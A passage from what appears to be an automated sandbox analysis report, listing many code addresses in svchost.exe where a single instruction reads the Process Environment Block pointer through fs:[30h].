                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h] 1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h] 1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h] 1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h] 1_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h] 1_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h] 1_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h] 1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h] 1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h] 1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h] 1_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h] 1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h] 1_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h] 1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h] 1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h] 1_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h] 1_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h] 1_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h] 1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h] 1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h] 1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h] 1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] 1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] 1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] 1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h] 1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h] 1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E016 mov eax, dword ptr fs:[00000030h]1_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A020 mov eax, dword ptr fs:[00000030h]1_2_03C2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C020 mov eax, dword ptr fs:[00000030h]1_2_03C2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6030 mov eax, dword ptr fs:[00000030h]1_2_03CC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]1_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB07C3 mov eax, dword ptr fs:[00000030h]1_2_03CB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C527ED mov eax, dword ptr fs:[00000030h]1_2_03C527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]1_2_03CBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C347FB mov eax, dword ptr fs:[00000030h]1_2_03C347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD678E mov eax, dword ptr fs:[00000030h]1_2_03CD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C307AF mov eax, dword ptr fs:[00000030h]1_2_03C307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE47A0 mov eax, dword ptr fs:[00000030h]1_2_03CE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov esi, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6674D mov eax, dword ptr fs:[00000030h]1_2_03C6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30750 mov eax, dword ptr fs:[00000030h]1_2_03C30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE75D mov eax, dword ptr fs:[00000030h]1_2_03CBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72750 mov eax, dword ptr fs:[00000030h]1_2_03C72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4755 mov eax, dword ptr fs:[00000030h]1_2_03CB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38770 mov eax, dword ptr fs:[00000030h]1_2_03C38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40770 mov eax, dword ptr fs:[00000030h]1_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C700 mov eax, dword ptr fs:[00000030h]1_2_03C6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30710 mov eax, dword ptr fs:[00000030h]1_2_03C30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60710 mov eax, dword ptr fs:[00000030h]1_2_03C60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C720 mov eax, dword ptr fs:[00000030h]1_2_03C6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov ecx, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6273C mov eax, dword ptr fs:[00000030h]1_2_03C6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC730 mov eax, dword ptr fs:[00000030h]1_2_03CAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]1_2_03C6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB06F1 mov eax, dword ptr fs:[00000030h]1_2_03CB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34690 mov eax, dword ptr fs:[00000030h]1_2_03C34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]1_2_03C6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C666B0 mov eax, dword ptr fs:[00000030h]1_2_03C666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C640 mov eax, dword ptr fs:[00000030h]1_2_03C4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF866E mov eax, dword ptr fs:[00000030h]1_2_03CF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A660 mov eax, dword ptr fs:[00000030h]1_2_03C6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62674 mov eax, dword ptr fs:[00000030h]1_2_03C62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE609 mov eax, dword ptr fs:[00000030h]1_2_03CAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4260B mov eax, dword ptr fs:[00000030h]1_2_03C4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72619 mov eax, dword ptr fs:[00000030h]1_2_03C72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E627 mov eax, dword ptr fs:[00000030h]1_2_03C4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66620 mov eax, dword ptr fs:[00000030h]1_2_03C66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68620 mov eax, dword ptr fs:[00000030h]1_2_03C68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3262C mov eax, dword ptr fs:[00000030h]1_2_03C3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E5CF mov eax, dword ptr fs:[00000030h]1_2_03C6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C365D0 mov eax, dword ptr fs:[00000030h]1_2_03C365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]1_2_03C6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]1_2_03C5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C325E0 mov eax, dword ptr fs:[00000030h]1_2_03C325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5ED mov eax, dword ptr fs:[00000030h]1_2_03C6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov eax, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32582 mov ecx, dword ptr fs:[00000030h]1_2_03C32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64588 mov eax, dword ptr fs:[00000030h]1_2_03C64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E59C mov eax, dword ptr fs:[00000030h]1_2_03C6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05A7 mov eax, dword ptr fs:[00000030h]1_2_03CB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C545B1 mov eax, dword ptr fs:[00000030h]1_2_03C545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38550 mov eax, dword ptr fs:[00000030h]1_2_03C38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6656A mov eax, dword ptr fs:[00000030h]1_2_03C6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6500 mov eax, dword ptr fs:[00000030h]1_2_03CC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04500 mov eax, dword ptr fs:[00000030h]1_2_03D04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40535 mov eax, dword ptr fs:[00000030h]1_2_03C40535
